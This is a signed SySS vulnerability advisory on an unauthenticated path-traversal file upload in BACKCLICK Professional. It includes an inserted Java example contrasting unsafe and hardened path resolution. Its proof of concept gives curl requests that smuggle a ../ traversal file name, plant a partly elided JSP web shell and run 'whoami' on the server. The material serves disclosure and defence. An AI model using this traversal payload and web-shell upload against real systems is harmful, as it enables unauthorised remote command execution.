-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2022-031
Product: BACKCLICK
Manufacturer: BACKCLICK GmbH
Tested Version(s): BACKCLICK Professional 5.9.63 (On-Premises)
Vulnerability Type: CWE-23: Relative Path Traversal
Risk Level: High
Solution Status: Unknown
Manufacturer Notification: 2022-05-25
Public Disclosure: 2022-11-14
CVE Reference: CVE-2022-44006
Author of Advisory: Moritz Bechler, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

BACKCLICK is a web application used for e-mail marketing and the
creation of newsletters.

The German manufacturer describes the product as follows (see [1]):

"BACKCLICK is a web-based enterprise e-mail marketing solution and
newsletter software with which you can create e-mail campaigns and
newsletters online and send them to your customers."

Due to improper validation or sanitization of upload file names, an
externally reachable, unauthenticated upload function permits writing
files outside the intended target location. Achieving remote code
execution is possible, e.g. by uploading a web shell.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The servlet at /bc/servlet/gui.FileUpload accepts HTML form file
uploads. This function can be accessed on the external web server and
does not require authentication (which also has further security
implications).

The file name submitted through the "name" parameter is used without
proper validation or sanitization to construct the target file path on
the server. By supplying a path containing /../ components, each of which
moves to the parent directory, the intended target directory can be
escaped. This allows writing arbitrary files to any location for which
the application server process has write permission on the file system.

This can, for example, be used to write a JSP web shell to the /assets/
directory, which is externally accessible; a JSP file placed there will
be interpreted by the servlet container.
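To illustrate the defect described above and its mitigation, the following is an added example written for this advisory, not code from BACKCLICK or SySS. It contrasts the vulnerable pattern (a user-supplied "name" concatenated directly into the target path) with a hardened variant that accepts only a bare file name, canonicalizes the result and verifies it stays inside the intended upload directory. The upload directory, the class and method names, and the allowed extensions are assumptions chosen for the example.

```java
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Locale;

// Added example (not BACKCLICK's code): resolving an upload target from a
// client-supplied file name, the unsafe way and the hardened way.
public final class UploadTarget {

    // Directory the uploads are meant to land in (assumed, illustrative path).
    static final Path UPLOAD_DIR =
            Paths.get("/var/lib/app/uploads").toAbsolutePath().normalize();

    /** Vulnerable pattern: the client-controlled name is joined onto the
     *  base directory without any check, so "../" components walk out of it. */
    public static Path resolveUnsafe(String userName) {
        return UPLOAD_DIR.resolve(userName);
    }

    /** Hardened pattern: accept a single path component only, normalize, and
     *  confirm the canonical result is still below UPLOAD_DIR. */
    public static Path resolveSafe(String userName) {
        if (userName == null || userName.isEmpty()) {
            throw new IllegalArgumentException("empty file name");
        }
        // Reject anything that is not a bare file name: separators for both
        // platforms, NUL bytes, and the special entries "." and "..".
        if (userName.contains("/") || userName.contains("\\")
                || userName.indexOf('\0') >= 0
                || userName.equals(".") || userName.equals("..")) {
            throw new IllegalArgumentException("invalid file name");
        }
        Path target = UPLOAD_DIR.resolve(userName).normalize();
        // Defense in depth: even after the checks above, verify containment.
        if (!target.startsWith(UPLOAD_DIR) || target.equals(UPLOAD_DIR)) {
            throw new IllegalArgumentException("path escapes upload directory");
        }
        // Allowlist extensions so server-side script files (e.g. .jsp) can
        // never be stored where the container would interpret them.
        String lower = userName.toLowerCase(Locale.ROOT);
        if (!(lower.endsWith(".png") || lower.endsWith(".jpg") || lower.endsWith(".pdf"))) {
            throw new IllegalArgumentException("file type not allowed");
        }
        return target;
    }

    public static void main(String[] args) {
        // Constructed sample inputs: a benign name and a traversal attempt of
        // the shape shown in the advisory.
        String[] names = {
            "report.pdf",
            "../../../../../../../var/lib/tomcat9/webapps/bc/assets/foo.jsp",
            "foo.jsp"
        };
        for (String n : names) {
            System.out.println("unsafe: " + n + " -> " + resolveUnsafe(n).normalize());
            try {
                System.out.println("safe  : " + n + " -> " + resolveSafe(n));
            } catch (IllegalArgumentException e) {
                System.out.println("safe  : " + n + " -> rejected (" + e.getMessage() + ")");
            }
        }
    }
}
```

Running the class prints the unsafe resolution of the traversal name landing under /var/lib/tomcat9/webapps/bc/assets/ while resolveSafe rejects it at the separator check, and rejects the bare "foo.jsp" at the extension allowlist. The containment check after normalize() is kept even though the separator filter already excludes traversal, so that a later relaxation of the filter does not silently reopen the issue. None of this replaces the missing authentication on the servlet, which is a separate finding the advisory notes; a hardened path check should sit behind an authenticated, authorized upload endpoint.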
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

A simple JSP web shell can be uploaded, for example, using curl:

- -----
$ curl -i -s -k -H \
  $'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryyHghZhtH1FLC5fFd' \
  --data-binary $'------WebKitFormBoundaryyHghZhtH1FLC5fFd
Content-Disposition: form-data; name=\"name\"

../../../../../../../var/lib/tomcat9/webapps/bc/assets/foo.jsp
- ------WebKitFormBoundaryyHghZhtH1FLC5fFd
Content-Disposition: form-data; name=\"uploadedfile\"; filename=\"hello.o\"
Content-Type: application/octect-stream

<%@ page import=\"java.util.*,java.io.*\"%>
<%
if (request.getParameter(\"c\") != null) {
        Process p = [....]
}
%>
}
\x0d\x0a
- ------WebKitFormBoundaryyHghZhtH1FLC5fFd--\x0d\x0a' \
  $'https://externalhost/bc/servlet/gui.FileUpload?mid=0'

HTTP/1.1 200 200
Date: Mon, 21 Mar 2022 12:57:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 54
Content-Type: application/json

{"jsonrpc" : "2.0", "result" : "success", "id" : "id"}
- -----

Then the web shell can be used to execute arbitrary system commands as
the Tomcat user:

- -----
$ curl -k -i https://externalhost/bc/assets/foo.jsp?cmd=whoami
HTTP/1.1 200 200
Date: Mon, 21 Mar 2022 13:00:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Set-Cookie: JSESSIONID=F63AA2F3A546DE04073190E78F23D5E2; Path=/bc; Secure; HttpOnly
Content-Length: 198
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1

Command: whoami
tomcat
- -----

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Contact vendor for solution.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-05-25: Vulnerabilities reported to manufacturer
2022-06-28: Advisories provided again, as originals were not received
2022-07-20: Confirmation, inquiry regarding reproduction of one issue
2022-11-14: No more information received, public disclosure of
            vulnerabilities

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for BACKCLICK
    https://www.backclick.de/
[2] SySS Security Advisory SYSS-2022-031
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-031.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Bechler of SySS GmbH.

E-Mail: moritz.bechler@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc
Key ID: 0x768EFE2BB3E53DDA
Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQEzBAEBCgAdFiEELI/xAZ13veZGXszCdo7+K7PlPdoFAmNkyT4ACgkQdo7+K7Pl
PdpoAAgArm/KWF1ajtO8UKjX1pD2aJ1+I+r0kse9VIOOKdgjfXfdiH2JHUyWsQO0
ARjDIJgrzbV0zeHG7Perr76G0uPH6YmDqc1IsG1kDCtJ0unD/MCUJVO3jpEfBNkQ
DA3YnkY/MuGXlQ8DqySrHOxq8YtBi0Fyi9kVPx4rQ0tB8XyKp+B7wS8iL6UR9Hw2
604dK5VQNR4qrlDcvhPXw+O2/KJ1a2onnATKNEwlZE3fx+OJTRjMbZXSDBUWeVWg
rb9KjCkFORBd0jhzyhdDs8ULpI8eIIUw+UqmV65XRjQu23sAV8oFAcn6n3xTlxBL
w09jGpNA/9j8QLb8hyCBrd1QPLiGkw==
=Xng3
-----END PGP SIGNATURE-----